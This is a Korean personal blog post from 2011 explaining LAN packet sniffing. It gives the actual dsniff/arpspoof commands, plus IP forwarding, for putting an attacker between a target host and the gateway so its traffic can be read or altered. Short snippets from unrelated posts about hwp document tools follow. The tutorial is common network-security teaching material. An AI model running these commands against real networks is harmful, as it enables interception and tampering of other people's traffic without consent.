2011년 8월 8일 월요일
스니핑(sniffing)은 패킷을 감청하는 것을 의미한다.
허브에 PC1~PC8까지 연결되어 있다고 할 경우,
그 중 임의의 컴퓨터에서 자신을 포함한 다른 컴퓨터에서 보내는 패킷을 감청할 수 있다.
자신의 랜카드가 promiscuous 모드를 지원한다면, wireshark 로 보면 된다.
자신의 랜카드가 promiscuous 모드를 지원하지 않을 경우에는 wireshark로 보면 자신의 것밖에는 보이지 않는다. 이 경우, arpspoof 를 이용한다. arpspoof 는 dsniff 패키지에 들어있다.
apt-get install dsniff
# ip forward 기능 활성화
echo 1 > /proc/sys/net/ipv4/ip_forward
# gateway ip: 192.168.10.1 또는 192.168.1.1, 게이트웨이 IP는 다를 수 있다.
# 목표물 ip: 192.168.10.5
arpspoof -t 192.168.10.5 192.168.10.1 &
arpspoof -t 192.168.10.1 192.168.10.5 &
이렇게 하면 공격자가 목표물과 gateway 사이에 끼어들게 된다.
목표물(192.168.10.5) -- 공격자 -- gateway -- 외부 네트워크
따라서 패킷 감청, 변조가 가능하다. ngrep, wireshark 등의 프로그램으로 패킷을 감청할 수 있다.
작업을 끝낸 후에는 killall arpspoof 명령으로 위의 프로세스를 죽이도록 하자.
-
그 동안 제가 끝글자 버그를 잡지 않고 방치한 이유 우선 책임, 의무가 없습니다. 제가 해당 어플 개발자도 아닐 뿐더러 오픈소스가 원래가 유지보수 의무, 보증 책임이 없습니다 . 이렇게 개떡 같은 게 오픈소스입니다. 전 과거 libhwp 하냐고...
-
달콤(Dalkom)은 리브레오피스에서 hwp 문서를 보기 위한 확장 기능입니다. libhwp 와 연동에 성공하여 hwp 문서에 있는 문자를 리브레오피스에서 볼 수 있습니다. 시간상의 이유 때문에 우선적으로 문자만 작업했습니다. 렌더링을 리브레오피... -
제가 원래 개발자가 아니라 원래가 일반 사용자였습니다.과거 MS윈도우 품질이 개떡같아서 유닉스 사용하다가 유닉스가 비싸고 망해서 리눅스를 사용하고 있는 거고 리눅스 품질이 지금은 우수하지만 예전에는 문제가 진짜 많았죠. 그렇게 리눅스를 지금까지 사용해...
댓글 없음:
댓글 쓰기